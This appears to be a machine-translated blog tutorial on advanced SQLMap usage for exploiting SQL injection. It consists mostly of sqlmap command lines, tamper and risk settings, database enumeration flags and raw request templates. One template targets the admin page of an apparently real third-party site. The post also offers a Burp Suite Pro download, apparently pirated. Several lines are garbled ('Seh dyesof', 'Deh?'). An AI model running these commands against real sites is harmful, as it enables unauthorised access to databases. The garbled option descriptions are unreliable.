How to use advanced SQLMap

SQLMap is a software that helps to exploit SQL Injection automatically, saving you more time than manual mining. I already have a guide on how to use basic SQLMap, but SQLMap still has advanced parameters to help you save mining time and increase mining efficiency. Here are some advanced SQLMap usage techniques for you to exploit SQL Injection errors.

How to use advanced SQLMap

I will briefly talk about how to install and use SQLMap first:

Seh dyesof --batch Deh? SQLMap runs automatically and skips yes/no questions

Seh dyesof *Determine the injection location

Seh dyesof --string="String_in_the_response" Dto know which string has been successfully injected (True)

sqlmap -u "https://anonyviet.com/s.php?q=test" -p "q"

sqlmap -r request.txt

sqlmap -m urls.txt

sqlmap -u "http://afine.com/user/*" -H "User-agent: *"

sqlmap -r request.txt --second-order "http://afine.com/avatar"

--random-agent

--batch

--risk=3 --level=5

--proxy=http://127.0.0.1:8080

-v 0
-v 4

--output-dir=sqlmap

--prefix "this_string_must_be_before_injection"

--suffix "--this_string_must_be_at_the_end_of_injection"

sqlmap -u "https://afine.com/s.php?q=1" -p 'q' --eval='q=q.replace(" ","%20")'

--tamper="PATH_OR_NAME_OF_TAMPER_SCRIPT"

-H "Auth_header: secret1" -H "Cookie: auth2=secret2"

python sqlmap.py -r request.txt --random-agent --tamper=space2comment --time-sec=20 --level=5 --risk=3 --dbs --batch

Request form POST: Inject into Username, then enter * in username=

POST //index.php?module=user&function=login HTTP/1.1
Host: anonyviet.com

username=*&password=1

Save the file as request.txt and put it in the sqlmap folder

Request dạng GET:

GET /admin/index.php?option=tin-sua&tin_id=1
Host: phanthiet.terracottaresort.com

Save the file as request.txt and put it in the sqlmap folder

Use the Burp Suite Pro Extension.

Download Burp Suite Pro here

• Request Timer – Captures response packets in time (suitable for blind sql injection).

• Burp Bounty Pro: automatically search for security holes with Burp Suite Pro (if you need this Extension, I will send it separately in the comments below)

Any SQLI found by SQLiPy will be added tab Results by Burp Suite.

Payload SQL Injection

Summary of Payloads to test SQL Injection is here: PayloadsAllTheThings.

SQLMap CheatSheel download here: https://github.com/anonyvietofficial/sqlmap-cheatsheet